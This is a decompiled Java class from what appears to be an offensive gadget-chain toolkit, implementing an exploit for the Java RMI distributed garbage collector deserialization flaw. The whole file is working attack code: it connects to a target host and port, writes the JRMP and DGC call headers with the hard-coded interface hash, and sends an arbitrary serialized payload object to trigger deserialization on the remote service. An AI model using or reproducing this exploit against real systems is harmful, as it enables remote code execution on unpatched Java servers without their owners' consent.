package com.ar3h.chains.core.exploit;

import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.core.exploit.component.MarshalOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import javax.net.SocketFactory;

@GadgetAnnotation(name = "RMI底层JRMP的dgc存在反序列化漏洞", authors = {Authors.MBECHLER})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/exploit/RMIDGCExploit.class */
public class RMIDGCExploit {
    public String target;
    public String payloadObject;

    public void work() {
        String[] split = this.target.split(":");
        if (split.length == 2) {
            try {
                makeDGCCall(split[0], Integer.parseInt(split[1]), this.payloadObject);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    public static void makeDGCCall(String str, int i, Object obj) throws IOException {
        new InetSocketAddress(str, i);
        Socket socket = null;
        DataOutputStream dataOutputStream = null;
        try {
            socket = SocketFactory.getDefault().createSocket(str, i);
            socket.setKeepAlive(true);
            socket.setTcpNoDelay(true);
            OutputStream outputStream = socket.getOutputStream();
            dataOutputStream = new DataOutputStream(outputStream);
            dataOutputStream.writeInt(1246907721);
            dataOutputStream.writeShort(2);
            dataOutputStream.writeByte(76);
            dataOutputStream.write(80);
            MarshalOutputStream marshalOutputStream = new MarshalOutputStream(dataOutputStream);
            marshalOutputStream.writeLong(2L);
            marshalOutputStream.writeInt(0);
            marshalOutputStream.writeLong(0L);
            marshalOutputStream.writeShort(0);
            marshalOutputStream.writeInt(1);
            marshalOutputStream.writeLong(-669196253586618813L);
            marshalOutputStream.writeObject(obj);
            outputStream.flush();
            if (dataOutputStream != null) {
                dataOutputStream.close();
            }
            if (socket != null) {
                socket.close();
            }
        } catch (Throwable th) {
            if (dataOutputStream != null) {
                dataOutputStream.close();
            }
            if (socket != null) {
                socket.close();
            }
            throw th;
        }
    }
}
